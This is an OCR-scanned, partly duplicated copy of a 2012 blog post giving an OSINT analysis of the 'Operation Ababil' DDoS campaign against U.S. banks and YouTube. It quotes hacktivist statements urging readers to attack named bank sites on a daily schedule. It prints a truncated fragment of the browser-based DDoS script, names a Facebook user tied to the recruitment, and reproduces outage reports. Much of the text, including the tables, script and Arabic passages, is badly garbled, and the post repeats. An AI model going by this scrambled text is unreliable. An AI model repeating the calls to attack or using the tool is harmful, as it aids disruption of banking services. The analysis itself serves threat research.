YouTube for keeping the video online, and against several 

[2] major U.S banks and financial institutions. 

Dubbed 11 Operation Ababii", and operated by the Izz ad-Din 
al-Qassam a.k.a Qassam Cyber Fighters , the campaign 
appear to have had a limited, but highly visible impact on 
the targeted web sites. Just like in every other 

crowdsourced opt-in botnet campaign such as the 11 

[3] Coordinated Russia vs Georgia cyber attack in 
progress", the "[4]lranian opposition launches 
organized cyber attack against pro-Ahmadinejad 
sites", the "[5]Electronic Jihad v3.0 - What Cyber Jihad 
Isn't" campaign, and the "[6]The DDoS Attack Against 
CNN.com" campaign, political sentiments over the 
attribution element seem to have orbited around the notion 
that it was [7]nation-sponsored by 

the Iranian government. 

What's so special about this attack? Did the individuals 
behind it poses sophisticated hacking or coding abili¬ 
ties? Was the work of hacktivists crowdsourcing bandwidth, 
or was it actually sponsored by the Iranian government? 

Can we even talk about attack attribution given that the 
group claiming responsibility for the attacks doesn't have a 
strong digital fingerprint? 

In this post, I'll perform an OSINT (open source intelligence) 
analysis aiming to expose one of the individuals 



part of the group that organized the campaign, spread their 
propaganda message to as many Muslim Facebook 

groups as possible, and actually claim responsibility for the 
attacks once they took place. 

The campaign originally began with a message left on 
Pastebin.com by the Qassam Cyber Fighters group an¬ 
nouncing "Operation Ababil": 
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Operation Ababil: second step over chase.com 

BY QASSAMCTBERFIGHTERS ON SEP 19TH, 2012 | SYNTAX: NONE I SEE: 0.47 KB | HITS: 2,874 | EXPIRES: NEVER 
DOWNIOAO RAW I EMBED | REPORT ABUSE 



"Operation Ababil” started over BoA : 

http://pastebin.com/mCHia4WS 
http://pastebin. coo/ wMma9zyG 

In the second step we attacked the largest bank or the united states, the "chase” bank. These series or 
attacks will continue untill the Erasing or that nasty movie from the Internet. 

The site "www.chase.com~ is down and also Online banking at "chaseonline.chase.com" is being decided to 
be orriine ! 

Down with modern inridels. 


sss Cyber fighters of Izz ad-din A1 qassam ss* 

The original message left is as follows: 

11 Operation Ababil, The second weekln the previous 
announcements we stated that we will not tolerate insulting 
exalted character of the prophet of mercy and kindness. Due 
to the insult, we planned and accomplished a series of cyber 
operations against the insulting country's credit and financial 
centers.Some U.S. officials tried to divert people's attention 
from the subject and claimed that the main aim of the 
operation was not deal to insults but it had other intentions. 


The officials claimed that certain countries have taken these 
measures to solve their internal problems. We 

strongly reject the American officials' insidious attempts to 
deceive public opinion. We declare that the kindness and 
love of Muslims and free-minded people of the world to the 
great prophet of Islam is much more than their violent anger 
be deflected and controlled by such deceptive tricks.Insult to 
a prophet is not acceptable especially when it is the Last 
prophet Muhammad (Peace Be upon Him). 

So as we promised before, the attack will be continued until 
the removal of that sacrilegious movie from the 

Internet. Therefore, we suggest a Timetable for this week 
attacks. Knowing which times the banks and other targets 
are out of service, the customers of targeted sites also can 
manage to do their jobs as well and have a rest white the 
specific organization is under attack. We shall attack for 8 
hours daily, starting at 2:30 PM GMT, every day. 

We repeat again the attacks will continue for sure till the 
removal of that sacrilegious movie. We invite all cyberspace 
workers to join us in this Proper Act. If America's arrogant 
government do not submit, the attack will be large and 
larger and will include other evil countries like Israel, French 
and U. Kingdom indeed. Tuesday 9/25/2012 : attack to Wells 
Fargo site, www.wellsfargo.comWednesday 9/26/2012 : 
attack to U.S. Bank site, www.usbank.comThursday 

9/27/2012 : attack to PNC site, www.pnc.com Weekends: 
planning for the next week' attacks.Mrt. izz ad-Din 

ai-Qassam Cyber Fighters" 

Periodically, the group also released update notes for 
the campaigns currently taking place: 



The original message published is as follows: 
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< Bank of America and New York Stock Exchange under attack unt 

BT QASSAMCY8ERFIGHTERS ON SEP 18TH 2012 I SYNTAX NONE I SIZE: 1.08 KB | HITS: 7,579 | EXPIRES: NEVER 
DOWNLOAD | RAW | EMBED I REPORT ABUSE 



Ij s 

Dear Muslim youths, Muslims Nations and are noblemen 

When Arab nations rose against their corrupt regimes (those who support Zionist regime) at the other 
hand when. Crucify infidels are terrified and they are no more supporting human rights. United States of 
America with the help of Zionist Regime made a Sacrilegious movie insulting all the religions not only 
Islam. 

All the Muslims worldwide must unify and Stand against the action, Muslims must do whatever is necessary 
to stop spreading this movie. We will attack them for this insult with all we have. 

All the Muslim youths who are active in the Cyber world will attack to American and Zionist Web bases as 
much as needed such that they say that they are sorry about that insult. 

We, Cyber fighters of I:: ad-din A1 qassam will attack the Bank of America and New York Stock Exchange 
for the first step. These Targets are properties of American-Zionist Capitalists. This attack will be 
started today at 2 pm. GMT. This attack will continue till the Erasing of that nasty movie. Beware this 
attack can vary in type. 

Down with modern infidels. 


" Operation Ababil" started over BoA 
:http://pastebin. com/mCHia4 1/1/5 
http://pastebin.com/wMma9zyGln the second step we 
attacked the largest bank of the united states, the "chase" 
bank. These series of attacks will continue untill the Erasing 
of that nasty movie from the Internet. The site 
"www.chase.com" is down and also Online banking at 

"chaseoniine.chase.com" is being decided to be Offline 
'.Down with modern infidels. # # # Cyber fighters of izz ad¬ 
din Ai qassam # # #" 

Second statement released by the group: 

The original message published is as follows: 

11 Dear Muslim youths, Muslims Nations and are 
noblemenWhen Arab nations rose against their corrupt 
regimes 



(those who support Zionist regime) at the other hand when, 
Crucify infidels are terrified and they are no more 

supporting human rights. United States of America with the 
help of Zionist Regime made a Sacrilegious movie 

insulting ail the religions not only Islam.All the Muslims 
worldwide must unify and Stand against the action, Muslims 
must do whatever is necessary to stop spreading this movie. 

We will attack them for this insult with ail we have.AH the 
Muslim youths who are active in the Cyber world 

will attack to American and Zionist Web bases as much as 
needed such that they say that they are sorry about that 
insult. We, Cyber fighters of izz ad-din Ai qassam will attack 
the Bank of America and New York Stock Exchange for the 
first step. These Targets are properties of American-Zionist 
Capitalists. This attack will be started today at 2 pm. 

GMT. This attack will continue till the Erasing of that nasty 
movie. Beware this attack can vary in type. Down with 
modern infidels. " 

Clearly, the group behind the campaigns aimed to deliver 
concise propaganda to prospective Internet con¬ 
nected users who would later on be instructed on how to 
participate in the DDoS attacks. Let's assess the potential 

of the distributed DDoS tool that was used in the campaign. 

Sample screenshot of the DDoS script in Arabic: 


411 



JS £ j* -* Mj£jj) fZLa yi ^»il 4** _/-&* ^ 

j^i) >■ jijJ j#i» ^ j* ^ <&_>« l i' sL) ^k. U3 «»» -T”-- j J^i^. <^}ja ]4 *£-LJi j i-jSJ Ji» ] 7 Vc.1—3 _j~ ] gjjti j* lj* J^jj »- 

Nhskiu of the world 

Ptibfcshing tbe* affnwr film on You Tube against the prophet of Islam has hurt every Musfcn feelings 
By running this plan since 18 September at 5 pm (Mecca's Local Tine . 1400 GMT) we w® be united 
We wfl continue our attacks against financial centers of the United States unti removing these sideos by achninistratoe of the site 

www BankOCAxncrka com 
www nasdaq com 
wwwjysc.com 


Start Attack 


</div> 

<div> 


'vnipuL Ly|_;e= ii iuucii 


i u= mc^^ayc vaiuc= 


</div> 


<dl> 

<dd 

<dt 

<dd 

<dt 

<dd 

</dl> 


style= 
style= 
style= 
style= 
style= 


<label id="statuss"x/label> 
opacity: 
opacity: 
opacity: 
opacity: 
opacity: 


0.5;display:none; 
0.5;display:none; 
0.5;display:none; 
0.5;display:none; 
0.5;display:none; 


id="requestedctr"x/dd> 
" >&nbsp;</dt> 

1 id="succeededctr">0</dd> 
">&nbsp; </dt> 

" id="failedctr">0</dd> 


<script> 
var i=0; 



(function () { 

var fireinterval; 
var isFiring = false; 

var requestedctrNode = document.getElementByld("requestedctr"), 
succeededetrNode = document.getElementByld("succeededctr"), 
failedctrNode = document.getElementByld("failedctr"), 
targetURLNode = document.getElementByld("targetURL"), 
fireButton = document.getElementByld("fireButton"), 
messageNode = document.getElementByld("message"), 
rpsNoae = document.getElementByld('rps"), 
timeoutNode = document.getElementByld("timeout"), 

statuss = document.getElementByld("statuss"); 
var targetURL = targetURLNode.value; 
taraetURLNode.onchanae = function O f 


Inside the .html file, we can see that there are only three web 
addresses that will be targeted in their campaign: 


Detection rate for the DDoS script: 

youtube.html - [8]MD5: 
C3fd7601b4aefe70e4a8f6d73bf5c997 












Detected by 6 out of 43 antivirus scanners as HTool-Loic; 
Hacktool.Generic; TROJ _GEN.F47V0924 

Originally, the attack relied on a static recruitment message 
which included links to the DIY DDoS script lo¬ 
cated on 4shared.com and Mediafire.com. What's 
particularly interesting is the fact that the files were 
uploaded by a user going under the handle of" Marzi 
Mahdavi II". It's important to point out that these static links 
were 412 



1(5! Album* 


» Subscribe Message « ▼ 


Mao 


•ft worked at 
d Uves n Tehran, Iran 
• From Tehran, Iran 
9 Female 


About 


Work and Education 

OjlJj <U 


Info 


Do you know Marzi? 


rife 


^4 

37 


facebook 


w -< W • i 7 


Marzi Mahdavi II 


distributed as part of the recruitment campaign across 
multiple Muslim-friendly Facebook groups. 









Thanks to this fact, we could easily identify the user's 
Facebook account, and actually spot the original message 

seeking participation in the upcoming attacks. 

Marzi Mahdavi M's Facebook account: 

Sample shared Wall post seeking participation in the 
upcoming DDoS campaign: 
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A Marzi Mahdavi n Timeline ▼ How ▼ | 

; i. A jjj * *•> jl JLjl^juuO lj ^1 

I 3 

>i 0^>S JLJA U .ju*S l>^l lj Ol 9 tsjS ^Ija&jurl JjIS 09>i jl lj v9 

. jlAjljo CfcJlaS <ki £,sj-*±> «u)Ij>j Start Attack 










Sample blog post enticing users to participate: 
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Just like Attack to YouTube site you can Download the Links and run the web 
page and simply hit the Start at the time of Attack. 



Marzi Mahdavi II has once referenced a link pointing to the 
same blog, clearly indicating that he's following the 

ongoing recruitment campaigns across multiple Web sites: 

Second blog post enticing users to participate in the 
DDoS campaign: 
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According to YouTube administrator refusal to remove the prophet of Islam- 
insulting video, an internet group has developed a computer program - that is 
approved by Hilf-ol-Fozoul experts - to prevent the release of the video. 

When they run that program, YouTube will be impaired. 

For more influence of this action, it is necessary to run the program by a large 
number of users simultaneously. 

Tomorrow on 15 September at 4 pm. (Mecca Local Time) the action will begin. 
The considered file has been designed in html format. You can download it 
from links below: 

Link 1 



This very latest example of Iran's hacktivist community 
understanding of the cyber operations, once again lead me 

to the conclusion that what we've got here is either the fact 
that Iran's hacktivist community is lacking behind with years 
compared to sophisticated Eastern European hacking teams 
and cybercrime-friendly communities, or that Iran 

is on purposely demonstrating low cyber operation 
capabilities in an attempt to trick the Western world into 
thinking that it's still in a "catch up mode" with the rest of 
the world when it comes to offensive cyber operations. 

Did these coordinated DDoS campaigns actually had any 
impact on the targered web sites? According to data 

from the Host-Tracker, they seem to have achieved limited, 
but visible results, a rather surprising fact given the low 
profile DDoS script released by the campaigners. 










Sample Host-Tracker report for a targeted web site 
during the campaign: 
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•Sf. host-tracker.com 


dart r»w* 
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Cawerfieueen. "trad .comacr*. 

Carmen* , W» webare cam to Ccrrwcao* «mad 
OJT) 
M*> 
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Second Host-Tracker report for a targeted web site 
during the campaign: 
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•if. host-tracker.com ***■# 

TO«*W»mortlortag 



dwk miA 

[http://www.wellsfargo.co m 

Otw •«» o 


Tund*. Sxmrrtm 25, 2012 6 J2 <8 

b BO 


3 


c .*Jb*uhm fcr Ini' mwri atortt ard Ml nmferWy report! far hll|>: www.wi4>liwx|ux im 

n Kmrt IP I 

CKf^'npcnm 7 CI n>n Avmiq* 0 .«*« 0 H 0 


AJP.'tl hMtOS V 
M Iwltm (• nui M 
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roMcr (*4 ir**»c«d •of, tmecut)*) 

Wt " YOri ' ^ error Hep.cnrt-iid. m eai ty(\rtawn 
re nor (• 9 irp^MCBd •of. tmeout)') 

*«*> 

r.#v, Orer# «rror ay(\rirowri 
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Mrei, twllrut error M^_th(r^*d.rn»»Mg* 0 -rtrw-ri 
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Mnrfam. 
mMUndi ' 


Nsrfcirg. 


•nr Ml^ clpr# *«s.m 


9*) 

**t> 


r>ncn (#9 «f (imai)') 

tr r r ?; »ror 

finer (09 tr»^a««ad *of. trmouf)*) 


1*1 15168 13) 


•nr mfa.tiar* bed.miei e y CVrirpm 
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! error mb^_c«bt# Had.rTm.wgaP rrnoi-n 
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Quebec. Ci 
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SRi. Rvtiu error «*»> ..char* bad 
finer (09 
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♦«*> 

•nr MH)_ctoirtSed_rTMi ig K Vtopr 
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•ror Ht^>_chant^ed_mem agaC^rino-n 
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151 151 68133 


Mu. IX U5 error Htp_c»n*bed_me e i a g e P-rero-i 
finer (t 9 ir up acnaof. tmout)*) 


151 15168 133 


Diln. TX US error Mt^>_cHar< ied.m na ay p.**ro<n> 
finer (• 9 ir»*pitted eof. ttmout)*) 

error Hifa_cnrtbad_nniei ay (\rinor 
f MBor (• 9 ira i pacn eof. timeout)*) 

Moninl 

error bad jr«»My<Tr*n<>-r> 

*■* finer («9 in«a(Weof. timeout)*) 
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151 15168 133 


151 15168 133 1 


Third Host-Tracker report for a targeted web site 
during the campaign: 
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•* # \ host-tracker.com 

website mcnitoring service 



Tuesday, September 18, 2012 6:14:47 PM 

t Vi (9 

Check result Pmumrs W. » 'is nst. 

http://www.BankOfAmerica.com 

Check other sits: hup St Owd. iw. 

Subscrfce for free email alerts and site availability reports for http://www.BankOfAmerica.com 

typ* )wf«Ih«* I S sb ra boJ 

Location Result R ^^™' Se KB/sec IP Partner 


Received responses: 14 Ok 32 Fail 

New York, NY, 


Http 


US 


Jakarta, 

Indonesia 


Orlando, a, 
US 


error iHttp.client.Bad.messageCVJtiknown 
reason (e.g. cneipected eof, timeout)*) 

Htip 

error :Http_client.Bad_rnessage(*Unknown 
reason (e g cneipected eof, timeout)*) 

Http 

error :Htlp_c llentBad_message{*Unknown 
reason (e g. cneipected eof, timeout)*) 

Http 

Dallas, TX, US error :Ht*>_c lient.Bad_message(\r*nor«n 
reason (e.g. cneipected eof, timeout)") 

Http 

Kiev, Ckrane error Http .client. Bad_message(\lrkncr«n 
reason (e g. cneipected eof, timeout)*) 

. . Http 

rmngnam, erw .|^j C |(^g^_ messa g 9 ^jn( (nown 

reason (e.g. cneipected eof, timeout)*) 

Http 

Dallas, TX, US error :Http_client.Bad_message(\rkriorwn 
reason (e.g. cneipected eof, timeout)*) 

mi Http 

ansr1 ^’ ' error :Pntp_clientBad_message(Tjr*riown 
reason (e.g. cneipected eof, timeout)*) 


Average: 16,30 sec 
115.01 sec 

40.00 sec 


Atlanta, GA, 
US 


Ok 


80.50 sec 


80.50 sec 


80.51 sec 


40.00 sec 


40.00 sec 


40.00 sec 


0 65.22 sec 


0.00 

171.159.100.173 ! 

171.159.100.173 N> 

171.161.148.173 Af 

171.159.100.173 Pn 

171.159.100.173 HC 

171.159.100.173 to 

171.159.100.173 

171.161.148.173 R* 

0.00 171.159.228.173 Ph 


Count of nodi 
Hosting Partri 


ASP ACT hosiers W, 
Add buttons to your sit 



Http 

Pans, France error :Htlp_clientBad_messageOJ»r*nown 
reason (e.g. cneipected eof, timeout)*) 


40.00 sec 171.161.148.173 


Fourth Host-Tracker report for a targeted web site 
during the campaign: 
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host-tracker.com h «p" 

website monitoring service 


Check 


Saturday, September 15, 2012 8:02:50 PM 

1 13 □ 

Check result P«tm>ri«nt link to ihs ch»ck result 


http: //www. yo u tu be.com 

Check other site: hnptf ! Ctwi<now ] 


Subscribe fcr free email alerts and site availability reports for http://www.youtube.com 

typ* your-£»emad her* Subscrfce 

Location 

Result 

Page Size Response time 

KB/sec 

IP 

Partner 

Received responses: 39 Ok 8 Fail 

Average: 

0.88 sec 

183.18 



Atlanta, GA, US 

Htfp error: 303 

0 

0.09 sec 


74.125.228.97 

Phil-Hostinq.com 

Lansing, MI, US 

Http error:303 

0 

0.07 sec 


74.125.227.1 

R loserver 

Orlando, FL, US 

Http error:303 

0 

0.06 sec 


173.194.37.4 

Apto Hosting 

London, UK 

Htfp error:303 

0 

0.05 sec 


74.125.225.78 

vrtpalSplits 

Kansas City, MO, US 

Http error:303 

0 

0.08 sec 


74.125.225.68 

Admo.net LLC 

Frankfurt, Germany 

Ok 

167478 

0.48 sec 

343.63 

173.194.70.190 

mrhostbl 2 

Dallas, TX, US 

Http error:303 

0 

1.29 sec 


74.125.227.105 

Custom Hosting Solutions 

Minsk, Belarus 

Ok 

158379 

0.68 sec 

227.44 

173.194.32.36 

BellnfbNet Ltd. 

Los Angeles, CA, US 

Http error:303 

0 

0.10 sec 


173.194.33.2 

PremlumReseller 

Paris, France 

Http error 303 

0 

0.11 sec 


173.194.41.99 

Cyber Snake Ltd 

Dallas, TX, US 

Ok 

155239 

0.44 sec 

342.61 

74.125.227.105 

Custom Hosting Sobtons 

Washington, USA 

Ok 

160852 

0.38 sec 

413.41 

74.125.228.66 

Nidohosting 

Montreal, Quebec, Ca 

Ok 

154494 

2.43 sec 

62.20 

173.194.43.2 

NordGate networks 

Moscow. Russia 

Ok 

179298 

0.67 sec 

261.83 

173.194.32.200 

JustHost 


Fifth Host-Tracker report for a targeted web site 
during the campaign: 
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English French PVcck>si Soertsh 


Main page Spesritest b * t> Press Sign up Loam 


host-tracker.com ^ 

website monitoring service 


Thursday, September 27, 2012 5:09:35 PM 

t fi(23 

Check result P«im>r>»nt Iric to tfos <h«<fc reuk 

http://www.pnc.com 

Check other site: hup n [ Dwelt now 1 


Subscribe for free email alerts and site availabi lity reports fo r http://www.pnc.com 

typ*.youi@«m*i h*r« | Subxciibe 


Location 

Result 

Page Response , 

Size time KB/sec 

IP 

Received responses: 22 Ok 14 Fall 

Average: 5.32 sec 0.02 


New York, NY, 
US 

Http 

error :Http_client.Bad_message ("Unknown 
reason (e.g. unexpected eof timeout)") 

115.01 sec 

170.201.60.3 

Amsterdam, 

Netherlands 

Http 

error :Http_client.Bad_message ("Unknown 
reason (e.g. unexpected eof timeout)") 

40.00 sec 

170.201.60.3 

Haarlem, 

Netherlands 

Http 

error :Http_client.Bad_message("Unknown 
reason (e.g. unexpected eof timeout)") 

40.00 sec 

170.201.60.3 


Partner 


POhost 


Http 

Minsk, Belarus error:Httpjrlent.Bad_message("Unknown 
reason (e.g. unexpected eof, timeout)") 


Amsterdam, 

Netherlands 


Http 

error :Http .client. Bad.message ("Unknown 
reason (e.g. unexpected eof, timeout)") 


Birmingham, 

UK 


Http 

error :Http_client.Bad_message ("Unknown 
reason (e.g. unexpected eof, timeout)") 


40.00 sec 170.201.60.3 BellnfoNetltd 

40.09 sec 170.201.60.3 Hosttnaster, Ltd 

40.00 sec 170.201.60.3 loomla Hosting 


Dallas, TX, US 


Ok 


254 21.12 sec 


0.01 


170.201.60.3 


Custom H 
Solutions 


Toronto, ON, 
CA 


Http 

error:Http_cljent.Bad_message("Unknown 
reason (e.g. unexpected eof timeout)") 


40.00 sec 170.201.60.3 O ny xNetUa 


Is the Iranian government really behind this campaign, or 
was it actually the work of amateurs with outdated 


and virtually irrelevant technical skills? Taking into 
consideration the previous [9]DDoS campaign launched 
by 

Iranian hacktivists in 2009, in this very latest one we 
once again see a rather limited understanding of cyber 














operations taking into consideration the centralized nature of 
the chain of command in this group. 

What's also worth pointing out is the fact that this is the first 
public appearance of the group that claims re¬ 
sponsibility for these attacks. Considering this and the lack 
of a strong digital fingerprint for the group in question, 
virtually anyone on the Internet can [10]engineer cyber 
warfare tensions between Iran and the U.S, by 
basically impersonating a what's believed to be an Iranian 
group. 

This post has been reproduced from [HJDancho 
Danchev's blog. Follow him [12]on Twitter. 

1. http://www.zdnet.com/blo a /securitv/attack-of-the-opt-in- 
botnets/6268 
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2. http://www.reuters.com/article/2012/Q9/21/us-iran- 
c vberattacks-idUSBRE88K12H20120921 

3. http://www.zdnet.com/blo a /securitv/coordinated-russia-vs- 
aeora ia-cvber-attack-in-pro a ress/1670 

4. http://www.zdnet.com/blo a /securitv/iranian-o p position- 
launches-or a anized-cvber-attack-a a ainst-pro-ahmadm 

ei ad-sites/3613 

5. http://ddanchev.blo as pot.com/20Q7/ll/electronic-nhad- 
v30-what-cvber- [i ] had.html 

6. http://ddanchev.blo as pot.com/2008/Q4/ddos-attack- 
aa ainst-cnncom.html 


































7. 

httD://www.foxbusiness.com/industries/2012/09/24/lieberma 

n-blame-iran-for-cvber-attacks-on-bank-america-c 

hase/ 

8 . 

https://www.virustotal.com/file/a3be8deb4ebc8deld0dl946 

7da606033c8938cf74d 148976 Ifbc9el95d7dlc75/analvsis/ 

1348697936/ 

9. http://www.zdnet.com/blo a /securitv/iranian-o p position- 
launches-or a anized-cvber-attack-a a ainst-pro-ahrnadin 

ei ad-sites/3613 

10. http://www.zdnet.com/blo a /securitv/should-a-tar a eted- 
countrv-strike-back-at-the-cvber-attackers/6194 

11. http://ddanchev.blo as pot.com/ 

12. http://twitter.com/danchodanchev 
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Operation Ababil, The second week 


In the previous announcements we stated that we will not tolerate insulting exalted character of the prophet of 
mercy and kindness. Oue to the insult, we planned and accomplished a series of cyber operations against the 
insulting country’s credit and financial centers. 

Some U.S. officials tried to divert people's attention from the subject and claimed that the main aim of the 
operation was not deal to insults but it had other intentions. The officials claimed that certain countries have 
taken these measures to solve their internal problems. 

Me strongly reject the American officials’ insidious attempts to deceive public opinion. Me declare that the 
kindness and love of Muslims and free-minded people of the world to the great prophet of Islam is much more than 
their violent anger be deflected and controlled by such deceptive tricks. 

Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad (Peace Be upon Him). So as 
we promised before, the attack will be continued until the removal of that sacrilegious movie from the Internet. 

Therefore, we suggest a Timetable for this week attacks. Knowing which times the banks and other targets are out 
of service, the customers of targeted sites also can manage to do their jobs as well and have a rest while the 
specific organization is under attack. 

Me shall attack for 8 hours daily, starting at 2:18 PM GMT, every day. Me repeat again the attacks will continue 
for sure till the removal of that sacrilegious movie. 

Dissecting 'Operation Ababil' - an OSINT Analysis 
(2012-09-28 00:25) 

Provoked by a questionable online video posted on YouTube, 
Muslims from the around the world united in an 

apparent [l]opt-in botnet crowdsourcing campaign 

aiming to launch a DDoS (denial of service attack) against 

YouTube for keeping the video online, and against several 

[2]major U.S banks and financial institutions. 

Dubbed " Operation Ababil ", and operated by the Izz ad-Din 
al-Qassam a.k.a Qassam Cyber Fighters , the campaign 
appear to have had a limited, but highly visible impact on 
the targeted web sites. Just like in every other 


crowdsourced opt-in botnet campaign such as the 11 

[3]Coordinated Russia vs Georgia cyber attack in 


progress", the "[4]lranian opposition launches 
organized cyber attack against pro-Ahmadinejad 
sites", the "[5]Electronic Jihad v3.0 - What Cyber Jihad 
Isn't" campaign, and the "[6]The DDoS Attack Against 
CNN.com" campaign, political sentiments over the 
attribution element seem to have orbited around the notion 
that it was [7]nation-sponsored by 

the Iranian government. 

What's so special about this attack? Did the individuals 
behind it poses sophisticated hacking or coding abili¬ 
ties? Was the work of hacktivists crowdsourcing bandwidth, 
or was it actually sponsored by the Iranian government? 

Can we even talk about attack attribution given that the 
group claiming responsibility for the attacks doesn't have a 
strong digital fingerprint? 

In this post, I'll perform an OSINT (open source intelligence) 
analysis aiming to expose one of the individuals 

part of the group that organized the campaign, spread their 
propaganda message to as many Muslim Facebook 

groups as possible, and actually claim responsibility for the 
attacks once they took place. 

The campaign originally began with a message left on 
Pastebin.com by the Qassam Cyber Fighters group an¬ 
nouncing "Operation Ababil": 
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d Operation Ababil: second step over chase.com 

BY: QASSAMCYBERFIGHTERS ON SEP 19TH, 2012 | SYNTAX: NONE I SEE: 0.47 KB I HITS: 2,874 | EXPIRES: NEVER 
DOWNLOAD RAW I EMBED | REPORT ABUSE 



"Operation Ababil” started over BoA : 

http://pastebin.coa/mCHia4WS 
http://pastebin. cob/ wMma9zyG 

In the second step we attacked the largest bank of the united states, the "chase" bank. These series of 
attacks will continue untill the Erasing of that nasty movie from the Internet. 

The site “www. chase.com" is down and also Online banking at ~chaseonline.chase.com" is being decided to 
be Offline ! 

Down with modern infidels. 


##s Cyber fighters of Izz ad-din A1 qassam »#* 

The original message left is as follows: 

11 Operation Ababil, The second weekin the previous 
announcements we stated that we will not tolerate insulting 
exalted character of the prophet of mercy and kindness. Due 
to the insult, we planned and accomplished a series of cyber 
operations against the insulting country's credit and financial 
centers.Some U.S. officials tried to divert people's attention 
from the subject and claimed that the main aim of the 
operation was not deal to insults but it had other intentions. 

The officials claimed that certain countries have taken these 
measures to solve their internal problems. We 

strongly reject the American officials' insidious attempts to 
deceive public opinion. We declare that the kindness and 
love of Muslims and free-minded people of the world to the 
great prophet of Islam is much more than their violent anger 
be deflected and controlled by such deceptive tricks.Insult to 
a prophet is not acceptable especially when it is the Last 
prophet Muhammad (Peace Be upon Him). 


So as we promised before, the attack will be continued until 
the removal of that sacrilegious movie from the 

Internet. Therefore, we suggest a Timetable for this week 
attacks. Knowing which times the banks and other targets 
are out of service, the customers of targeted sites also can 
manage to do their jobs as well and have a rest while the 
specific organization is under attack. We shall attack for 8 
hours daily, starting at 2:30 PM GMT, every day. 

We repeat again the attacks will continue for sure till the 
removal of that sacrilegious movie. We invite ail cyberspace 
workers to join us in this Proper Act. If America's arrogant 
government do not submit, the attack will be large and 
larger and will include other evil countries like Israel, French 
and U. Kingdom indeed. Tuesday 9/25/2012 : attack to Wells 
Fargo site, www.wellsfargo.comWednesday 9/26/2012 : 
attack to U.5. Bank site, www.usbank.comThursday 

9/27/2012 : attack to PNC site, www.pnc.com Weekends: 
planning for the next week' attacks.Mrt. Izz ad-Din 

ai-Qassam Cyber Fighters" 

Periodically, the group also released update notes for 
the campaigns currently taking place: 

The original message published is as follows: 
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, -j Bank of America and New York Stock Exchange under attack unt 

BY: QASSAMCYBERFIGHTERS ON SEP 18TH, 2012 | SYNTAX: NONE I SIZE: 1.08 KB | HITS: 7,579 | EXPIRES: NEVER 
DOWNLOAD | RAW | EMBED I REPORT ABUSE 



ij w 

Dear Muslim youths, Muslims Nations and are noblemen 

When Arab nations rose against their corrupt regimes (those who support Zionist regime) at the other 
hand when. Crucify infidels are terrified and they are no more supporting human rights. United States of 
America with the help of Zionist Regime made a Sacrilegious movie insulting all the religions not only 
Islam. 

All the Muslims worldwide must unify and Stand against the action, Muslims must do whatever is necessary 
to stop spreading this movie. We will attack them for this insult with all we have. 

All the Muslim youths who are active in the Cyber world will attack to American and Zionist Web bases as 
much as needed such that they say that they are sorry about that insult. 

We, Cyber fighters of I:: ad-din A1 qassam will attack the Bank of America and New York Stock Exchange 
for the first step. These Targets are properties of American-Zionist Capitalists. This attack will be 
started today at 2 pm. GMT. This attack will continue till the Erasing of that nasty movie. Beware this 
attack can vary in type. 

Down with modern infidels. 


" Operation Ababil" started over BoA 
:http://pastebin. com/mCHia4 1/1/5 
http://pastebin.com/wMma9zyGln the second step we 
attacked the largest bank of the united states, the "chase" 
bank. These series of attacks will continue untill the Erasing 
of that nasty movie from the Internet. The site 
"www.chase.com" is down and also Online banking at 

"chaseoniine.chase.com" is being decided to be Offline 
'.Down with modern infidels. # # # Cyber fighters of izz ad¬ 
din Ai qassam # # #" 

Second statement released by the group: 

The original message published is as follows: 

11 Dear Muslim youths, Muslims Nations and are 
noblemenWhen Arab nations rose against their corrupt 
regimes 

(those who support Zionist regime) at the other hand when, 
Crucify infidels are terrified and they are no more 



supporting human rights. United States of America with the 
help of Zionist Regime made a Sacrilegious movie 

insulting all the religions not only Islam.All the Muslims 
worldwide must unify and Stand against the action, Muslims 
must do whatever is necessary to stop spreading this movie. 

We will attack them for this insult with all we have.AH the 
Muslim youths who are active in the Cyber world 

will attack to American and Zionist Web bases as much as 
needed such that they say that they are sorry about that 
insult. We, Cyber fighters of Izz ad-din Ai qassam will attack 
the Bank of America and New York Stock Exchange for the 
first step. These Targets are properties of American-Zionist 
Capitalists. This attack will be started today at 2 pm. 

GMT. This attack will continue till the Erasing of that nasty 
movie. Beware this attack can vary in type. Down with 
modern infidels. " 

Clearly, the group behind the campaigns aimed to deliver 
concise propaganda to prospective Internet con¬ 
nected users who would later on be instructed on how to 
participate in the DDoS attacks. Let's assess the potential 

of the distributed DDoS tool that was used in the campaign. 

Sample screenshot of the DDoS script in Arabic: 
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JS £ j* -* Mj£jj) fZLa yi ^»il 4** _/-&* ^ 

j^i) >■ jijJ j#i» ^ j* ^ <&_>« l i' sL) ^k. U3 «»» -T”-- j J^i^. <^}ja ]4 *£-LJi j i-jSJ Ji» ] 7 Vc.1—3 _j~ ] gjjti j* lj* J^jj »- 

Nhskiu of the world 

Ptibfcshing tbe* affnwr film on You Tube against the prophet of Islam has hurt every Musfcn feelings 
By running this plan since 18 September at 5 pm (Mecca's Local Tine . 1400 GMT) we w® be united 
We wfl continue our attacks against financial centers of the United States unti removing these sideos by achninistratoe of the site 

www BankOCAxncrka com 
www nasdaq com 
wwwjysc.com 


Start Attack 


</div> 

<div> 


'vnipuL Ly|_;e= ii iuucii 


i u= mc^^ayc vaiuc= 


</div> 


<dl> 

<dd 

<dt 

<dd 

<dt 

<dd 

</dl> 


style= 
style= 
style= 
style= 
style= 


<label id="statuss"x/label> 
opacity: 
opacity: 
opacity: 
opacity: 
opacity: 


0.5;display:none; 
0.5;display:none; 
0.5;display:none; 
0.5;display:none; 
0.5;display:none; 


id="requestedctr"x/dd> 
" >&nbsp;</dt> 

1 id="succeededctr">0</dd> 
">&nbsp; </dt> 

" id="failedctr">0</dd> 


<script> 
var i=0; 



(function () { 

var fireinterval; 
var isFiring = false; 

var requestedctrNode = document.getElementByld("requestedctr"), 
succeededetrNode = document.getElementByld("succeededctr"), 
failedctrNode = document.getElementByld("failedctr"), 
targetURLNode = document.getElementByld("targetURL"), 
fireButton = document.getElementByld("fireButton"), 
messageNode = document.getElementByld("message"), 
rpsNoae = document.getElementByld('rps"), 
timeoutNode = document.getElementByld("timeout"), 

statuss = document.getElementByld("statuss"); 
var targetURL = targetURLNode.value; 
taraetURLNode.onchanae = function O f 


Inside the .html file, we can see that there are only three web 
addresses that will be targeted in their campaign: 


Detection rate for the DDoS script: 

youtube.html - [8]MD5: 
C3fd7601b4aefe70e4a8f6d73bf5c997 












Detected by 6 out of 43 antivirus scanners as HTool-Loic; 
Hacktool.Generic; TROJ _GEN.F47V0924 

